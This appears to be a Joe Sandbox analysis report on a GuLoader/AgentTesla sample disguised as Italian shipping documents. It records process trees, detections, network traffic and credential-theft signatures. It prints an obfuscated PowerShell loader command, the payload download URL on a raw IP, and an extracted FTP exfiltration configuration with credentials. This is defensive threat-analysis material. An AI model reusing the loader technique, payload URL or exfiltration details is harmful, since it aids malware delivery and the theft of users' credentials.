Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documenti di spedizione 0009333000459595995.exe

Overview

General Information

Sample name:Documenti di spedizione 0009333000459595995.exe
Analysis ID:1518101
MD5:6c446fd0a3f6d498f5cbd0725ce7f232
SHA1:d814c5f4bc9a61690318ba2ed8ec22d55af16cce
SHA256:8a149e1ded1cce5485b9783687dd8f94c2f3926edd17e62a682fe56cc73b1ae4
Tags:exeSpam-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Documenti di spedizione 0009333000459595995.exe (PID: 6728 cmdline: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe" MD5: 6C446FD0A3F6D498F5CBD0725CE7F232)
    • powershell.exe (PID: 5480 cmdline: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wabmig.exe (PID: 6824 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000001.00000002.2394657139.0000000008C11000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: wabmig.exe PID: 6824JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            System Summary

            barindex
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5480, TargetFilename: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" , CommandLine: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", ParentImage: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe, ParentProcessId: 6728, ParentProcessName: Documenti di spedizione 0009333000459595995.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" , ProcessId: 5480, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-25T12:09:07.525705+020028032702Potentially Bad Traffic192.168.2.449737185.29.11.5380TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://ftp.concaribe.comAvira URL Cloud: Label: malware
            Source: powershell.exe.5480.1.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: Documenti di spedizione 0009333000459595995.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: Documenti di spedizione 0009333000459595995.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: jqm.Core.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbPCp source: powershell.exe, 00000001.00000002.2393965982.00000000081B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbLC source: powershell.exe, 00000001.00000002.2393965982.00000000081B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2389766114.00000000070C4000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C63
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_004068B4 FindFirstFileW,FindClose,0_2_004068B4
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
            Source: Joe Sandbox ViewIP Address: 192.185.13.234 192.185.13.234
            Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 185.29.11.53:80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bIGuEflfnZjESw74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: unknownTCP traffic detected without corresponding DNS query: 185.29.11.53
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bIGuEflfnZjESw74.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.29.11.53Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ftp.concaribe.com
            Source: wabmig.exe, 00000006.00000002.2932025679.0000000008166000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 00000006.00000002.2944817255.0000000023210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.bin
            Source: wabmig.exe, 00000006.00000002.2932025679.0000000008166000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.binI
            Source: wabmig.exe, 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://concaribe.com
            Source: wabmig.exe, 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.concaribe.com
            Source: Documenti di spedizione 0009333000459595995.exe, Documenti di spedizione 0009333000459595995.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2377692974.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2377692974.0000000004A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
            Source: wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_0040571B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040571B

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: Documenti di spedizione 0009333000459595995.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exeJump to dropped file
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile created: C:\Windows\SysWOW64\sennepssovsenJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_00406DC60_2_00406DC6
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_0040759D0_2_0040759D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00C1EBD81_2_00C1EBD8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00C1F4A81_2_00C1F4A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00C1E8901_2_00C1E890
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_026DA2286_2_026DA228
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_026DE3606_2_026DE360
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_026D4A586_2_026D4A58
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_026DAAB06_2_026DAAB0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_026D3E406_2_026D3E40
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_026D41886_2_026D4188
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_2693CE306_2_2693CE30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_2693A7DC6_2_2693A7DC
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_269392C86_2_269392C8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_2693BB906_2_2693BB90
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_269556A06_2_269556A0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_269566C06_2_269566C0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_26957E406_2_26957E40
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_2695C2406_2_2695C240
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_269523806_2_26952380
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_2695B3006_2_2695B300
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_269577606_2_26957760
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_2695E4686_2_2695E468
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_26955DC86_2_26955DC8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_269500406_2_26950040
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 6_2_269500066_2_26950006
            Source: Documenti di spedizione 0009333000459595995.exeStatic PE information: invalid certificate
            Source: Documenti di spedizione 0009333000459595995.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/12@2/3
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403532
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_004049C7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049C7
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile created: C:\Users\user\AppData\Local\acneformJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile created: C:\Users\user\AppData\Local\Temp\nspE80D.tmpJump to behavior
            Source: Documenti di spedizione 0009333000459595995.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeFile read: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exeSection loaded: wintypes.dllJump to behavior
